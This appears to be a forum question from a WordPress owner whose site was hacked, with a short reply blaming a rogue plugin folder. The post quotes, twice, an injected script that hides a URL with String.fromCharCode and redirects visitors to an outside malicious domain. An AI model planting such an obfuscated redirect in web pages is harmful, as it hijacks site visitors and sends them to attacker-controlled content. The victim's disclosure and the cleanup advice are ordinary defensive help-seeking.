WordPress site hacked redirect

i have a wordpress website and i saw that when i try to view the source code with chrome its show me this (look at the code):

so i search it in my files and found a file called lt_ that has that redirect code so i wanted to know how to find the source of the malware

<head>
    <script>window.location.href = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 105, 114, 99, 46, 108, 111, 118, 101, 103, 114, 101, 101, 110, 112, 101, 110, 99, 105, 108, 115, 46, 103, 97, 47, 112, 86, 77, 89, 110, 49, 120, 82, 63, 101, 120, 116, 101, 114, 110, 97, 108, 95, 105, 100, 61, 50, 49, 38, 97, 100, 95, 99, 97, 109, 112, 97, 105, 103, 110, 95, 105, 100, 61, 52, 51, 54, 55, 53);</script>
</head>

JavaScript
​x
 
<head>    <script>window.location.href = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 105, 114, 99, 46, 108, 111, 118, 101, 103, 114, 101, 101, 110, 112, 101, 110, 99, 105, 108, 115, 46, 103, 97, 47, 112, 86, 77, 89, 110, 49, 120, 82, 63, 101, 120, 116, 101, 114, 110, 97, 108, 95, 105, 100, 61, 50, 49, 38, 97, 100, 95, 99, 97, 109, 112, 97, 105, 103, 110, 95, 105, 100, 61, 52, 51, 54, 55, 53);</script></head>​

Answer

check this: wp-content/plugins/ * try to find wp-sleeeps * / that is the problem. Delete wp-sleeeps and after that delete lt_ Same problem last 3 hours,

Advertisement

Answer